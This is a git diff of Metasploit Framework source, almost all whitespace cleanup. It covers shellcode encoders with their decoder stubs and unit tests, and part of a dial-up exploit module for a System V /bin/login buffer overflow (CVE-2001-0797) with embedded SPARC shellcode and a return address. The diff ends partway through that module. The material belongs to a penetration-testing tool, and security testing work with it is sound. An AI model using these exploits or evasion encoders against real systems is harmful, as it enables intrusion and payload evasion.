b/modules/encoders/cmd/ifs.rb index d2b17b2bba..7f4834710b 100644 --- a/modules/encoders/cmd/ifs.rb +++ b/modules/encoders/cmd/ifs.rb @@ -3,7 +3,7 @@ ## ## -# This file is part of the Metasploit Framework and may be subject to +# This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit # Framework web site for more information on licensing and terms of use. # http://metasploit.com/framework/ @@ -31,13 +31,13 @@ class Metasploit3 < Msf::Encoder 'Arch' => ARCH_CMD) end - + # # Encodes the payload # def encode_block(state, buf) buf.gsub!(/\s/, '${IFS}') return buf - end + end end diff --git a/modules/encoders/encoder_test.rb.ut.rb b/modules/encoders/encoder_test.rb.ut.rb index e639ea25e4..0a39ffe413 100644 --- a/modules/encoders/encoder_test.rb.ut.rb +++ b/modules/encoders/encoder_test.rb.ut.rb @@ -3,7 +3,7 @@ ## ## -# This file is part of the Metasploit Framework and may be subject to +# This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit # Framework web site for more information on licensing and terms of use. # http://metasploit.com/framework/ @@ -48,4 +48,4 @@ $framework.encoders.each_module { |name, mod| $stderr.puts("#{name.ljust(25)}: Passed: #{passed}, Failed: #{failed}, Unique: #{h.keys.length}") -} \ No newline at end of file +} diff --git a/modules/encoders/generic/none.rb b/modules/encoders/generic/none.rb index 3d5774a36e..f26a1cc2d8 100644 --- a/modules/encoders/generic/none.rb +++ b/modules/encoders/generic/none.rb @@ -3,7 +3,7 @@ ## ## -# This file is part of the Metasploit Framework and may be subject to +# This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit # Framework web site for more information on licensing and terms of use. # http://metasploit.com/framework/ @@ -35,4 +35,4 @@ class Metasploit3 < Msf::Encoder buf end -end \ No newline at end of file +end diff --git a/modules/encoders/generic/none.rb.ut.rb b/modules/encoders/generic/none.rb.ut.rb index 5051441f5a..2b257762b1 100644 --- a/modules/encoders/generic/none.rb.ut.rb +++ b/modules/encoders/generic/none.rb.ut.rb @@ -3,7 +3,7 @@ ## ## -# This file is part of the Metasploit Framework and may be subject to +# This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit # Framework web site for more information on licensing and terms of use. # http://metasploit.com/framework/ @@ -36,7 +36,7 @@ class Metasploit3 < Msf::Test::Unit::TestCase raw, k.encode(raw, '') ) } - + end -end \ No newline at end of file +end diff --git a/modules/encoders/mipsbe/longxor.rb b/modules/encoders/mipsbe/longxor.rb index 3b44ed6ca8..a972d90013 100644 --- a/modules/encoders/mipsbe/longxor.rb +++ b/modules/encoders/mipsbe/longxor.rb @@ -3,7 +3,7 @@ ## ## -# This file is part of the Metasploit Framework and may be subject to +# This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit # Framework web site for more information on licensing and terms of use. # http://metasploit.com/framework/ @@ -22,7 +22,7 @@ class Metasploit3 < Msf::Encoder::Xor 'Version' => '$Revision$', 'Description' => %q{ Mips Web server exploit friendly xor encoder - }, + }, 'Author' => 'Julien Tinnes ', 'Arch' => ARCH_MIPSBE, 'License' => MSF_LICENSE, @@ -44,7 +44,7 @@ class Metasploit3 < Msf::Encoder::Xor number_of_passes=state.buf.length/4+1 raise InvalidPayloadSizeException.new("The payload being encoded is too long (#{state.buf.length} bytes)") if number_of_passes > 10240 raise InvalidPayloadSizeException.new("The payload is not padded to 4-bytes (#{state.buf.length} bytes)") if state.buf.length%4 != 0 - + # 16-bits not (again, see below) reg_14 = (number_of_passes+1)^0xFFFF decoder = Metasm::Shellcode.assemble(Metasm::MIPS.new(:big), < '$Revision$', 'Description' => %q{ Mips Web server exploit friendly xor encoder - }, + }, 'Author' => 'Julien Tinnes ', 'Arch' => ARCH_MIPSLE, 'License' => MSF_LICENSE, @@ -44,7 +44,7 @@ class Metasploit3 < Msf::Encoder::Xor number_of_passes=state.buf.length/4+1 raise InvalidPayloadSizeException.new("The payload being encoded is too long (#{state.buf.length} bytes)") if number_of_passes > 10240 raise InvalidPayloadSizeException.new("The payload is not padded to 4-bytes (#{state.buf.length} bytes)") if state.buf.length%4 != 0 - + # 16-bits not (again, see below) reg_14 = (number_of_passes+1)^0xFFFF decoder = Metasm::Shellcode.assemble(Metasm::MIPS.new(:little), < 4, 'BlockSize' => 4, - 'KeyPack' => 'N', + 'KeyPack' => 'N', }) end # - # Returns the decoder stub + # Returns the decoder stub # def decoder_stub(state) [ @@ -59,7 +59,7 @@ class Metasploit3 < Msf::Encoder::Xor end # - # Fix up the decoder stub now + # Fix up the decoder stub now # def encode_finalize_stub(state, stub) stub[22, 2] = [ state.key.to_i ].pack('N')[0, 2] @@ -75,4 +75,4 @@ class Metasploit3 < Msf::Encoder::Xor state.encoded += [ state.key.to_i ].pack('N') end -end \ No newline at end of file +end diff --git a/modules/encoders/sparc/longxor_tag.rb b/modules/encoders/sparc/longxor_tag.rb index 55b8fe8d2d..9f2759b3a1 100644 --- a/modules/encoders/sparc/longxor_tag.rb +++ b/modules/encoders/sparc/longxor_tag.rb @@ -3,7 +3,7 @@ ## ## -# This file is part of the Metasploit Framework and may be subject to +# This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit # Framework web site for more information on licensing and terms of use. # http://metasploit.com/framework/ @@ -29,25 +29,25 @@ class Metasploit3 < Msf::Encoder::XorAdditiveFeedback { 'KeySize' => 4, 'BlockSize' => 4, - 'KeyPack' => 'N', + 'KeyPack' => 'N', }) end # - # Returns the decoder stub + # Returns the decoder stub # def decoder_stub(state) - Rex::Arch::Sparc.set_dword(state.key, 'l1') + - "\x20\xbf\xff\xff" + # bn,a _start - 4 - "\x20\xbf\xff\xff" + # bn,a _start - "\x7f\xff\xff\xff" + # call _start + 4 - "\xea\x03\xe0\x20" + # ld [%o7 + 0x20],%l7 - "\xaa\x9d\x40\x11" + # xorcc %l5,%l1,%l5 - "\xea\x23\xe0\x20" + # st %l5,[%o7 + 0x20] - "\xa2\x04\x40\x15" + # add %l1,%l5,%l1 - "\x81\xdb\xe0\x20" + # flush %o7 + 0x20 - "\x12\xbf\xff\xfb" + # bnz dec_loop - "\x9e\x03\xe0\x04" # add %o7,4,%o7 + Rex::Arch::Sparc.set_dword(state.key, 'l1') + + "\x20\xbf\xff\xff" + # bn,a _start - 4 + "\x20\xbf\xff\xff" + # bn,a _start + "\x7f\xff\xff\xff" + # call _start + 4 + "\xea\x03\xe0\x20" + # ld [%o7 + 0x20],%l7 + "\xaa\x9d\x40\x11" + # xorcc %l5,%l1,%l5 + "\xea\x23\xe0\x20" + # st %l5,[%o7 + 0x20] + "\xa2\x04\x40\x15" + # add %l1,%l5,%l1 + "\x81\xdb\xe0\x20" + # flush %o7 + 0x20 + "\x12\xbf\xff\xfb" + # bnz dec_loop + "\x9e\x03\xe0\x04" # add %o7,4,%o7 end # @@ -67,5 +67,5 @@ class Metasploit3 < Msf::Encoder::XorAdditiveFeedback badchars ) ? false : true) end - -end \ No newline at end of file + +end diff --git a/modules/encoders/x64/xor.rb b/modules/encoders/x64/xor.rb index 50e7b08271..455da0686a 100644 --- a/modules/encoders/x64/xor.rb +++ b/modules/encoders/x64/xor.rb @@ -3,7 +3,7 @@ ## ## -# This file is part of the Metasploit Framework and may be subject to +# This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit # Framework web site for more information on licensing and terms of use. # http://metasploit.com/framework/ @@ -33,10 +33,10 @@ class Metasploit3 < Msf::Encoder::Xor end def decoder_stub( state ) - + # calculate the (negative) block count . We should check this against state.badchars. block_count = [-( ( (state.buf.length - 1) / state.decoder_key_size) + 1)].pack( "V" ) - + decoder = "\x48\x31\xC9" + # xor rcx, rcx "\x48\x81\xE9" + block_count + # sub ecx, block_count "\x48\x8D\x05\xEF\xFF\xFF\xFF" + # lea rax, [rel 0x0] @@ -44,7 +44,7 @@ class Metasploit3 < Msf::Encoder::Xor "\x48\x31\x58\x27" + # xor [rax+0x27], rbx "\x48\x2D\xF8\xFF\xFF\xFF" + # sub rax, -8 "\xE2\xF4" # loop 0x1B - + state.decoder_key_offset = decoder.index( 'XXXXXXXX' ) return decoder diff --git a/modules/encoders/x86/avoid_utf8_tolower.rb b/modules/encoders/x86/avoid_utf8_tolower.rb index 5d8c05ac3a..9037ea2d5e 100644 --- a/modules/encoders/x86/avoid_utf8_tolower.rb +++ b/modules/encoders/x86/avoid_utf8_tolower.rb @@ -3,7 +3,7 @@ ## ## -# This file is part of the Metasploit Framework and may be subject to +# This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit # Framework web site for more information on licensing and terms of use. # http://metasploit.com/framework/ @@ -20,7 +20,7 @@ require 'msf/core' # encoder cannot be used with all of the payloads included in the framework. # Most notably, this includes windows/shell_reverse_tcp. The reason for this # is that some payloads are of a size that leads to a bad character (uppercase -# character) being generated in the decoder stub header. +# character) being generated in the decoder stub header. # # A second thing to consider is that some IP addresses used in payloads are # incompatible with this encoder depending on their alignment within the @@ -47,7 +47,7 @@ require 'msf/core' # which uses a series of add or subtract operations on the third chunk of the # decoder to produce the actual opcodes of the encoded payload. For each four # bytes of encoded data, a sub or add instruction is used in combination with -# complementary information stored in the third chunk of the decoder. +# complementary information stored in the third chunk of the decoder. # # For example, in order to produce 0x01fdfeff one could do the following: # @@ -60,7 +60,7 @@ require 'msf/core' # simply fall through into the now-decoded payload that was stored in the # third chunk of the decoder. # -# The following is an example encoding of: +# The following is an example encoding of: # # "\xcc\x41\xcc\x41\xcc\x41\xcc\x41\xff\xfe\xfd\x01\xff\x02\x82\x4c" # @@ -168,7 +168,7 @@ class Metasploit3 < Msf::Encoder buf = try_sub(state, block) end - if (buf.nil?) + if (buf.nil?) raise BadcharError.new(state.encoded, 0, 0, 0) end @@ -179,11 +179,11 @@ class Metasploit3 < Msf::Encoder # Appends the encoded context portion. # def encode_end(state) - state.encoded += state.context + state.encoded += state.context end # - # Generate the instructions that will be used to produce a valid + # Generate the instructions that will be used to produce a valid # block after decoding using the sub instruction in conjunction with # two UTF8/tolower safe values. # @@ -256,7 +256,7 @@ class Metasploit3 < Msf::Encoder begin xv = rand(b - 1) + 1 - + attempts += 1 # Lame. @@ -279,4 +279,4 @@ class Metasploit3 < Msf::Encoder ((val >= 0x41 and val <= 0x5a) or val >= 0x80) or Rex::Text.badchar_index([val].pack('C'), state.badchars) end -end \ No newline at end of file +end diff --git a/modules/encoders/x86/call4_dword_xor.rb b/modules/encoders/x86/call4_dword_xor.rb index c86572b653..da34b273d8 100644 --- a/modules/encoders/x86/call4_dword_xor.rb +++ b/modules/encoders/x86/call4_dword_xor.rb @@ -3,7 +3,7 @@ ## ## -# This file is part of the Metasploit Framework and may be subject to +# This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit # Framework web site for more information on licensing and terms of use. # http://metasploit.com/framework/ @@ -35,7 +35,7 @@ class Metasploit3 < Msf::Encoder::Xor # the buffer being encoded # def decoder_stub(state) - decoder = + decoder = Rex::Arch::X86.sub(-(((state.buf.length - 1) / 4) + 1), Rex::Arch::X86::ECX, state.badchars) + "\xe8\xff\xff\xff" + # call $+4 @@ -51,4 +51,4 @@ class Metasploit3 < Msf::Encoder::Xor return decoder end -end \ No newline at end of file +end diff --git a/modules/encoders/x86/call4_dword_xor.rb.ut.rb b/modules/encoders/x86/call4_dword_xor.rb.ut.rb index 8383b549f6..a05cca02d2 100644 --- a/modules/encoders/x86/call4_dword_xor.rb.ut.rb +++ b/modules/encoders/x86/call4_dword_xor.rb.ut.rb @@ -3,7 +3,7 @@ ## ## -# This file is part of the Metasploit Framework and may be subject to +# This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit # Framework web site for more information on licensing and terms of use. # http://metasploit.com/framework/ @@ -29,7 +29,7 @@ class Metasploit3 < Msf::Test::Unit::TestCase k = Klass.new { - "\x41\x42\x43\x44" => + "\x41\x42\x43\x44" => [ "\x29\xc9\x83\xe9\xff\xe8\xff\xff\xff\xff\xc0\x5e\x81\x76" + "\x0e\x66\x30\x86\x84\x83\xee\xfc\xe2\xf4\x27\x72\xc5\xc0", @@ -51,7 +51,7 @@ class Metasploit3 < Msf::Test::Unit::TestCase assert_equal(real[0][offset, -1], encoded[offset, -1]) } - + end -end \ No newline at end of file +end diff --git a/modules/encoders/x86/countdown.rb b/modules/encoders/x86/countdown.rb index 18b61eae68..0e5bcb5a92 100644 --- a/modules/encoders/x86/countdown.rb +++ b/modules/encoders/x86/countdown.rb @@ -3,7 +3,7 @@ ## ## -# This file is part of the Metasploit Framework and may be subject to +# This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit # Framework web site for more information on licensing and terms of use. # http://metasploit.com/framework/ @@ -37,7 +37,7 @@ class Metasploit3 < Msf::Encoder::Xor # being encoded. # def decoder_stub(state) - decoder = + decoder = Rex::Arch::X86.set( Rex::Arch::X86::ECX, state.buf.length - 1, @@ -60,8 +60,8 @@ class Metasploit3 < Msf::Encoder::Xor # def encode_block(state, block) state.context += 1 - + [ block.unpack('C')[0] ^ (state.context - 1) ].pack('C') end -end \ No newline at end of file +end diff --git a/modules/encoders/x86/countdown.rb.ut.rb b/modules/encoders/x86/countdown.rb.ut.rb index 761d1824a3..1d0119733a 100644 --- a/modules/encoders/x86/countdown.rb.ut.rb +++ b/modules/encoders/x86/countdown.rb.ut.rb @@ -3,7 +3,7 @@ ## ## -# This file is part of the Metasploit Framework and may be subject to +# This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit # Framework web site for more information on licensing and terms of use. # http://metasploit.com/framework/ @@ -29,7 +29,7 @@ class Metasploit3 < Msf::Test::Unit::TestCase k = Klass.new { - "\xcc\xcc\xcc\xcc" => + "\xcc\xcc\xcc\xcc" => [ "\x6a\x03\x59\xe8\xff\xff\xff\xff\xc1\x5e\x30\x4c\x0e\x07" + "\xe2\xfa\xcd\xce\xcf\xc8", @@ -49,7 +49,7 @@ class Metasploit3 < Msf::Test::Unit::TestCase assert_equal(real[0][offset, -1], encoded[offset, -1]) } - + end -end \ No newline at end of file +end diff --git a/modules/encoders/x86/fnstenv_mov.rb b/modules/encoders/x86/fnstenv_mov.rb index 234599895e..bc18ba9506 100644 --- a/modules/encoders/x86/fnstenv_mov.rb +++ b/modules/encoders/x86/fnstenv_mov.rb @@ -3,7 +3,7 @@ ## ## -# This file is part of the Metasploit Framework and may be subject to +# This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit # Framework web site for more information on licensing and terms of use. # http://metasploit.com/framework/ @@ -20,9 +20,9 @@ class Metasploit3 < Msf::Encoder::Xor 'Name' => 'Variable-length Fnstenv/mov Dword XOR Encoder', 'Version' => '$Revision$', 'Description' => %q{ - This encoder uses a variable-length mov equivalent instruction + This encoder uses a variable-length mov equivalent instruction with fnstenv for getip. - }, + }, 'Author' => 'spoonm', 'Arch' => ARCH_X86, 'License' => MSF_LICENSE, @@ -38,10 +38,10 @@ class Metasploit3 < Msf::Encoder::Xor # being encoded. # def decoder_stub(state) - decoder = + decoder = Rex::Arch::X86.set( Rex::Arch::X86::ECX, - (((state.buf.length - 1) / 4) + 1), + (((state.buf.length - 1) / 4) + 1), state.badchars) + "\xd9\xee" + # fldz "\xd9\x74\x24\xf4" + # fnstenv [esp - 12] @@ -55,4 +55,4 @@ class Metasploit3 < Msf::Encoder::Xor return decoder end -end \ No newline at end of file +end diff --git a/modules/encoders/x86/fnstenv_mov.rb.ut.rb b/modules/encoders/x86/fnstenv_mov.rb.ut.rb index 21aa8cc9c4..b9ca2b6e38 100644 --- a/modules/encoders/x86/fnstenv_mov.rb.ut.rb +++ b/modules/encoders/x86/fnstenv_mov.rb.ut.rb @@ -3,7 +3,7 @@ ## ## -# This file is part of the Metasploit Framework and may be subject to +# This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit # Framework web site for more information on licensing and terms of use. # http://metasploit.com/framework/ @@ -29,7 +29,7 @@ class Metasploit3 < Msf::Test::Unit::TestCase k = Klass.new { - "\xcc\xcc\xcc\xcc" => + "\xcc\xcc\xcc\xcc" => [ "\x6a\x01\x59\xd9\xee\xd9\x74\x24\xf4\x5b\x81\x73\x13\x3e" + "\x33\x75\x05\x83\xeb\xfc\xe2\xf4\xf2\xff\xb9\xc9", @@ -50,7 +50,7 @@ class Metasploit3 < Msf::Test::Unit::TestCase assert_equal(real[0][offset, -1], encoded[offset, -1]) } - + end -end \ No newline at end of file +end diff --git a/modules/encoders/x86/jmp_call_additive.rb b/modules/encoders/x86/jmp_call_additive.rb index 7c7c35d30f..e78373b84d 100644 --- a/modules/encoders/x86/jmp_call_additive.rb +++ b/modules/encoders/x86/jmp_call_additive.rb @@ -3,7 +3,7 @@ ## ## -# This file is part of the Metasploit Framework and may be subject to +# This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit # Framework web site for more information on licensing and terms of use. # http://metasploit.com/framework/ @@ -28,20 +28,20 @@ class Metasploit3 < Msf::Encoder::XorAdditiveFeedback 'License' => MSF_LICENSE, 'Decoder' => { - 'Stub' => - "\xfc" + # cld - "\xbbXORK" + # mov ebx, key - "\xeb\x0c" + # jmp short 0x14 - "\x5e" + # pop esi - "\x56" + # push esi - "\x31\x1e" + # xor [esi], ebx - "\xad" + # lodsd - "\x01\xc3" + # add ebx, eax - "\x85\xc0" + # test eax, eax - "\x75\xf7" + # jnz 0xa - "\xc3" + # ret - "\xe8\xef\xff\xff\xff", # call 0x8 - 'KeyOffset' => 2, + 'Stub' => + "\xfc" + # cld + "\xbbXORK" + # mov ebx, key + "\xeb\x0c" + # jmp short 0x14 + "\x5e" + # pop esi + "\x56" + # push esi + "\x31\x1e" + # xor [esi], ebx + "\xad" + # lodsd + "\x01\xc3" + # add ebx, eax + "\x85\xc0" + # test eax, eax + "\x75\xf7" + # jnz 0xa + "\xc3" + # ret + "\xe8\xef\xff\xff\xff", # call 0x8 + 'KeyOffset' => 2, 'KeySize' => 4, 'BlockSize' => 4, }) diff --git a/modules/encoders/x86/nonalpha.rb b/modules/encoders/x86/nonalpha.rb index afd8c99ef6..39588fa2ed 100644 --- a/modules/encoders/x86/nonalpha.rb +++ b/modules/encoders/x86/nonalpha.rb @@ -3,7 +3,7 @@ ## ## -# This file is part of the Metasploit Framework and may be subject to +# This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit # Framework web site for more information on licensing and terms of use. # http://metasploit.com/framework/ @@ -25,8 +25,8 @@ class Metasploit3 < Msf::Encoder::NonAlpha 'Description' => %q{ Encodes payloads as non-alpha based bytes. This allows payloads to bypass both toupper() and tolower() calls, - but will fail isalpha(). Table based design from - Russel Sanford. + but will fail isalpha(). Table based design from + Russel Sanford. }, 'Author' => [ 'pusscat'], 'Arch' => ARCH_X86, diff --git a/modules/encoders/x86/nonupper.rb b/modules/encoders/x86/nonupper.rb index a890d7475f..93b5f4f3e7 100644 --- a/modules/encoders/x86/nonupper.rb +++ b/modules/encoders/x86/nonupper.rb @@ -3,7 +3,7 @@ ## ## -# This file is part of the Metasploit Framework and may be subject to +# This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit # Framework web site for more information on licensing and terms of use. # http://metasploit.com/framework/ @@ -53,7 +53,7 @@ class Metasploit3 < Msf::Encoder::NonUpper # def encode_block(state, block) begin - newchar, state.key, state.decoder_key_size = + newchar, state.key, state.decoder_key_size = Rex::Encoder::NonUpper::encode_byte(datastore['badchars'], block.unpack('C')[0], state.key, state.decoder_key_size) rescue RuntimeError => e # This is a bandaid to deal with the fact that, since it's in diff --git a/modules/encoders/x86/shikata_ga_nai.rb b/modules/encoders/x86/shikata_ga_nai.rb index 26b3106315..a6c2388bc5 100644 --- a/modules/encoders/x86/shikata_ga_nai.rb +++ b/modules/encoders/x86/shikata_ga_nai.rb @@ -3,7 +3,7 @@ ## ## -# This file is part of the Metasploit Framework and may be subject to +# This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit # Framework web site for more information on licensing and terms of use. # http://metasploit.com/framework/ @@ -61,7 +61,7 @@ class Metasploit3 < Msf::Encoder::XorAdditiveFeedback # Cache this decoder stub. The reason we cache the decoder stub is # because we need to ensure that the same stub is returned every time - # for a given encoder state. + # for a given encoder state. state.decoder_stub = block end @@ -76,22 +76,22 @@ protected # def fpu_instructions fpus = [] - + 0xe8.upto(0xee) { |x| fpus << "\xd9" + x.chr } 0xc0.upto(0xcf) { |x| fpus << "\xd9" + x.chr } 0xc0.upto(0xdf) { |x| fpus << "\xda" + x.chr } 0xc0.upto(0xdf) { |x| fpus << "\xdb" + x.chr } 0xc0.upto(0xc7) { |x| fpus << "\xdd" + x.chr } - + fpus << "\xd9\xd0" fpus << "\xd9\xe1" fpus << "\xd9\xf6" fpus << "\xd9\xf7" fpus << "\xd9\xe5" - + # This FPU instruction seems to fail consistently on Linux #fpus << "\xdb\xe1" - + fpus end @@ -104,7 +104,7 @@ protected count_reg = Rex::Poly::LogicalRegister::X86.new('count', 'ecx') addr_reg = Rex::Poly::LogicalRegister::X86.new('addr') key_reg = nil - + if state.context_encoding key_reg = Rex::Poly::LogicalRegister::X86.new('key', 'eax') else @@ -119,7 +119,7 @@ protected *fpu_instructions) fnstenv = Rex::Poly::LogicalBlock.new('fnstenv', "\xd9\x74\x24\xf4") - + # Get EIP off the stack popeip = Rex::Poly::LogicalBlock.new('popeip', Proc.new { |b| (0x58 + b.regnum_of(addr_reg)).chr }) @@ -177,9 +177,9 @@ protected Proc.new { |b| xor1.call(b) + add1.call(b) + add4.call(b) }, Proc.new { |b| xor1.call(b) + add4.call(b) + add2.call(b) }, Proc.new { |b| add4.call(b) + xor2.call(b) + add2.call(b) }) - + # Loop instruction block - loop_inst = Rex::Poly::LogicalBlock.new('loop_inst', + loop_inst = Rex::Poly::LogicalBlock.new('loop_inst', "\xe2\xf5") # Define block dependencies @@ -195,4 +195,4 @@ protected Rex::Arch::X86::ECX ], nil, state.badchars) end -end \ No newline at end of file +end diff --git a/modules/encoders/x86/single_static_bit.rb b/modules/encoders/x86/single_static_bit.rb index 7bfa84461b..8760344903 100644 --- a/modules/encoders/x86/single_static_bit.rb +++ b/modules/encoders/x86/single_static_bit.rb @@ -3,7 +3,7 @@ ## ## -# This file is part of the Metasploit Framework and may be subject to +# This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit # Framework web site for more information on licensing and terms of use. # http://metasploit.com/framework/ @@ -21,7 +21,7 @@ require 'msf/core' class Metasploit3 < Msf::Encoder # This encoder has a manual ranking because it should only be used in cases - # where information has been explicitly supplied, specifically + # where information has been explicitly supplied, specifically # BitNumber and BitValue. Rank = ManualRanking @@ -35,7 +35,7 @@ class Metasploit3 < Msf::Encoder 'License' => MSF_LICENSE, 'EncoderType' => Msf::Encoder::Type::SingleStaticBit ) - + # this shouldn't be present in the decoder stub. @key_marker = 0x1010 end @@ -106,7 +106,7 @@ class Metasploit3 < Msf::Encoder # next_dst_byte: inner_loop << next_byte # next_bit: - # I really wish this silly padding wasn't necessary, however removing the bad characters in the + # I really wish this silly padding wasn't necessary, however removing the bad characters in the # jump/call displacements has proven difficult otherwise. inner_loop << "\x90" * 0x1a # nops - for padding (so relative jumps don't have badchars) len = -1 * (inner_loop.length+2) @@ -146,11 +146,11 @@ class Metasploit3 < Msf::Encoder bit_num = (datastore['BitNumber'] || 5).to_i bit_num = (7-bit_num) bit_val = (datastore['BitValue'] || true) - + encoded = '' new_byte = 0 nbits = 0 - + block.unpack('C*').each do |ch| 7.step(0,-1) do |x| @@ -159,7 +159,7 @@ class Metasploit3 < Msf::Encoder new_byte <<= 1 if nbits > 0 new_byte |= 1 if bit_val nbits += 1 - + # do we have a full byte? if nbits == 8 encoded << new_byte.chr @@ -181,7 +181,7 @@ class Metasploit3 < Msf::Encoder end end end - + # if we have bits left, pad out to a whole byte if nbits > 0 while nbits < 8 @@ -191,7 +191,7 @@ class Metasploit3 < Msf::Encoder end encoded << new_byte.chr end - + return encoded end @@ -200,7 +200,7 @@ class Metasploit3 < Msf::Encoder # def encode_end(state) state.encoded += state.context - + xor_key = 0 xor_key_str = '' enc_len_str = '' @@ -212,9 +212,9 @@ class Metasploit3 < Msf::Encoder next if has_badchars?(enc_len_str, state.badchars) break end - + marker_str = [@key_marker].pack('v') - + state.encoded.sub!(marker_str, enc_len_str) state.encoded.sub!(marker_str, xor_key_str) end diff --git a/modules/encoders/x86/unicode_mixed.rb b/modules/encoders/x86/unicode_mixed.rb index 63e9da28e0..4de2078cb6 100644 --- a/modules/encoders/x86/unicode_mixed.rb +++ b/modules/encoders/x86/unicode_mixed.rb @@ -3,7 +3,7 @@ ## ## -# This file is part of the Metasploit Framework and may be subject to +# This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit # Framework web site for more information on licensing and terms of use. # http://metasploit.com/framework/ @@ -23,7 +23,7 @@ class Metasploit3 < Msf::Encoder::Alphanum 'Name' => "Alpha2 Alphanumeric Unicode Mixedcase Encoder", 'Version' => '$Revision$', 'Description' => %q{ - Encodes payloads as unicode-safe mixedcase text. This encoder uses + Encodes payloads as unicode-safe mixedcase text. This encoder uses SkyLined's Alpha2 encoding suite. }, 'Author' => [ 'pusscat', 'skylined' ], @@ -46,7 +46,7 @@ class Metasploit3 < Msf::Encoder::Alphanum if (not reg) raise RuntimeError, "Need BufferRegister" end - Rex::Encoder::Alpha2::UnicodeMixed::gen_decoder(reg, offset) + Rex::Encoder::Alpha2::UnicodeMixed::gen_decoder(reg, offset) end # @@ -71,4 +71,4 @@ class Metasploit3 < Msf::Encoder::Alphanum Rex::Text.to_unicode(buffer) end -end \ No newline at end of file +end diff --git a/modules/encoders/x86/unicode_upper.rb b/modules/encoders/x86/unicode_upper.rb index 7cd63b3257..2da99a6b84 100644 --- a/modules/encoders/x86/unicode_upper.rb +++ b/modules/encoders/x86/unicode_upper.rb @@ -3,7 +3,7 @@ ## ## -# This file is part of the Metasploit Framework and may be subject to +# This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit # Framework web site for more information on licensing and terms of use. # http://metasploit.com/framework/ @@ -46,7 +46,7 @@ class Metasploit3 < Msf::Encoder::Alphanum if (not reg) raise RuntimeError, "Need BufferRegister" end - Rex::Encoder::Alpha2::UnicodeUpper::gen_decoder(reg, offset) + Rex::Encoder::Alpha2::UnicodeUpper::gen_decoder(reg, offset) end # @@ -71,4 +71,4 @@ class Metasploit3 < Msf::Encoder::Alphanum Rex::Text.to_unicode(buffer) end -end \ No newline at end of file +end diff --git a/modules/exploits/dialup/multi/login/manyargs.rb b/modules/exploits/dialup/multi/login/manyargs.rb index 6d3c893c7d..995e6eb48e 100644 --- a/modules/exploits/dialup/multi/login/manyargs.rb +++ b/modules/exploits/dialup/multi/login/manyargs.rb @@ -1,3 +1,7 @@ +## +# $Id$ +## + ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit @@ -16,19 +20,19 @@ class Metasploit3 < Msf::Exploit::Remote super(update_info(info, 'Name' => 'System V Derived /bin/login Extraneous Arguments Buffer Overflow', 'Description' => %q{ - This exploit connects to a system's modem over dialup and exploits + This exploit connects to a system's modem over dialup and exploits a buffer overlflow vulnerability in it's System V derived /bin/login. The vulnerability is triggered by providing a large number of arguments. }, - 'References' => - [ - [ 'CVE', '2001-0797'], - [ 'OSVDB', '690'], - [ 'OSVDB', '691'], - [ 'BID', '3681'], - [ 'URL', 'http://archives.neohapsis.com/archives/bugtraq/2002-10/0014.html'], - [ 'URL', 'http://archives.neohapsis.com/archives/bugtraq/2004-12/0404.html'], - ], + 'References' => + [ + [ 'CVE', '2001-0797'], + [ 'OSVDB', '690'], + [ 'OSVDB', '691'], + [ 'BID', '3681'], + [ 'URL', 'http://archives.neohapsis.com/archives/bugtraq/2002-10/0014.html'], + [ 'URL', 'http://archives.neohapsis.com/archives/bugtraq/2004-12/0404.html'], + ], 'Version' => '$Revision$', 'Author' => [ @@ -37,30 +41,30 @@ class Metasploit3 < Msf::Exploit::Remote 'Arch' => ARCH_TTY, 'Platform' => ['unix'], 'License' => MSF_LICENSE, - 'Payload' => - { - 'Space' => 3000, - 'BadChars' => '', - 'DisableNops' => true, - }, - 'Targets' => - [ - ['Solaris 2.6 - 8 (SPARC)', { - 'Platform' => 'unix', - 'Ret' => 0x00027184, - # Solaris/SPARC special shellcode (courtesy of inode) - # execve() + exit() - 'Shellcode' => - "\x94\x10\x20\x00\x21\x0b\xd8\x9a\xa0\x14\x21\x6e\x23\x0b\xcb\xdc" + - "\xa2\x14\x63\x68\xd4\x23\xbf\xfc\xe2\x23\xbf\xf8\xe0\x23\xbf\xf4" + - "\x90\x23\xa0\x0c\xd4\x23\xbf\xf0\xd0\x23\xbf\xec\x92\x23\xa0\x14" + - "\x82\x10\x20\x3b\x91\xd0\x20\x08\x82\x10\x20\x01\x91\xd0\x20\x08", - 'NOP' => "\x90\x1b\x80\x0e", - } ], - - ], - 'DefaultTarget' => 0 - )) + 'Payload' => + { + 'Space' => 3000, + 'BadChars' => '', + 'DisableNops' => true, + }, + 'Targets' => + [ + [ 'Solaris 2.6 - 8 (SPARC)', + { + 'Platform' => 'unix', + 'Ret' => 0x00027184, + # Solaris/SPARC special shellcode (courtesy of inode) + # execve() + exit() + 'Shellcode' => + "\x94\x10\x20\x00\x21\x0b\xd8\x9a\xa0\x14\x21\x6e\x23\x0b\xcb\xdc" + + 